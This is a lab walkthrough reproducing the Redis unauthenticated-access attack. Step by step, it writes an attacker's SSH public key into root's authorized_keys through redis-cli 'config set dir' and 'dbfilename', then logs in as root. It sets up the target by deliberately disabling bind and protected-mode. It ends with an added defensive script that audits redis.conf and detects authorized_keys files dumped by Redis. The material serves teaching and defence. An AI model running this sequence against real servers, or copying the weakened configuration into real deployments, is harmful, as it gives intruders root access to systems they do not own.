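Conditions for the vulnerability
(1) redis is bound to 0.0.0.0:6379 and no security policy, such as firewall rules that block access from untrusted source IPs, has been applied, so it is exposed directly to the public internet;
(2) no password authentication is set (the password is usually empty), so the redis service can be logged into remotely without a password.
Reproduction environment
- Target machine:
1. centos6.5-32bit, IP address 192.168.10.136
2. redis-3.2.9
(2.1) Building and installing redis from source fails with an error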
In file included from adlist.c:34:
zmalloc.h:50:31: error: jemalloc/jemalloc.h: No such file or directory
zmalloc.h:55:2: error: #error "Newer version of jemalloc required"
Compiling redis fails with error: jemalloc/jemalloc.h: No such file or directory
The cause is that jemalloc overrides the ANSI C malloc and free functions on Linux.
Fix: pass an extra argument to make.
make MALLOC=libc
make install
mkdir /etc/redis
cp redis.conf /etc/redis/
(2.2) redis configuration file
vi /etc/redis/redis.conf
Comment out the bind line: #bind 127.0.0.1
Change protected-mode to no:
protected-mode no
- Attacking machine:
centos6.5-32bit, IP address 192.168.10.172
(1) Generate a key pair.
ssh-keygen -t rsa
# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
6d:54:ad:98:e8:04:52:47:e4:c3:d3:d5:e7:57:4c:f3 root@localhost.localdomain
The key's randomart image is:
+--[ RSA 2048]----+
| ..o+ oo +.|
| . .+ . o o *|
| . .=.oo . oE|
| o=o . o|
| oS o .|
| .. |
| |
| |
| |
+-----------------+
This creates the files id_rsa (private key) and id_rsa.pub (public key) in /root/.ssh/.
(2) Store the public key contents in redis
(echo -e "\n\n";cat /root/.ssh/id_rsa.pub;echo -e "\n\n";) | /usr/local/bin/redis-cli -h 192.168.10.136 -x set redis_ssh_test
[root@localhost .ssh]# (echo -e "\n\n";cat /root/.ssh/id_rsa.pub;echo -e "\n\n";) | /usr/local/bin/redis-cli -h 192.168.10.136 -x set redis_ssh_test
OK
(3) Connect to redis remotely with redis-cli, set the storage path, and save
/usr/local/bin/redis-cli -h 192.168.10.136
config set dir /root/.ssh
Note: the /root/.ssh directory must already exist on the target machine, otherwise the setting fails with (error) ERR Changing directory: No such file or directory
192.168.10.136:6379> config set dir /root/.ssh
OK
192.168.10.136:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.10.136:6379> config set dbfilename authorized_keys
OK
192.168.10.136:6379> config get dbfilename
1) "dbfilename"
2) "authorized_keys"
192.168.10.136:6379> save
OK
192.168.10.136:6379> exit
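- Finally
ssh root@192.168.10.136; after running it you are connected directly to the target machine.
Note: on CentOS, passwordless SSH login requires SELinux to be disabled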
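An added example, not part of the original post: a shell audit that checks a redis.conf for the two conditions listed at the top of this page, and checks whether an authorized_keys file begins with the RDB magic string "REDIS", which is how a file written by SAVE starts. The function names and the sample files are constructed for this example, and an absent protected-mode line is treated as yes, the Redis 3.2 default.

```shell
#!/bin/sh
# Added example (not from the original page); function names are this example's own.

# Print the arguments of the last uncommented directive $2 in config file $1.
last_directive() {
    awk -v k="$2" 'tolower($1) == k { $1 = ""; sub(/^ +/, ""); v = $0 }
                   END { print v }' "$1"
}

# Print a verdict for redis.conf $1; return 1 when the instance is reachable
# from other hosts without a password.
audit_redis_conf() {
    bind=$(last_directive "$1" bind)
    pass=$(last_directive "$1" requirepass)
    prot=$(last_directive "$1" protected-mode)
    remote=""
    for a in $bind; do
        case $a in 127.*|::1) ;; *) remote=$a ;; esac
    done
    if [ -n "$pass" ]; then
        echo "OK: requirepass is set"
    elif [ -n "$remote" ]; then
        # protected mode does not apply once bind is set explicitly
        echo "EXPOSED: bind $remote without requirepass"; return 1
    elif [ -z "$bind" ] && [ "$prot" = no ]; then
        echo "EXPOSED: all interfaces, protected-mode no, no requirepass"; return 1
    else
        echo "OK: unauthenticated, but loopback only"
    fi
}

# Succeed if file $1 starts with the RDB magic "REDIS" (written by SAVE).
is_rdb_dump() {
    [ "$(dd if="$1" bs=5 count=1 2>/dev/null)" = REDIS ]
}

# Constructed sample input: the target's redis.conf as edited in step (2.2),
# a hardened counterpart, and a simplified stand-in for a dumped authorized_keys.
demo=$(mktemp -d)
printf '#bind 127.0.0.1\nprotected-mode no\nport 6379\n' > "$demo/weak.conf"
printf 'bind 127.0.0.1\nprotected-mode yes\nrequirepass CHANGE_ME\n' > "$demo/hard.conf"
printf 'REDIS0007\n\nssh-rsa AAAA...constructed... root@host\n\n' > "$demo/authorized_keys"

audit_redis_conf "$demo/weak.conf" || true
audit_redis_conf "$demo/hard.conf"
is_rdb_dump "$demo/authorized_keys" && echo "authorized_keys was written by Redis"
```

On a real host, point audit_redis_conf at /etc/redis/redis.conf and is_rdb_dump at each account's ~/.ssh/authorized_keys.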
Related documents: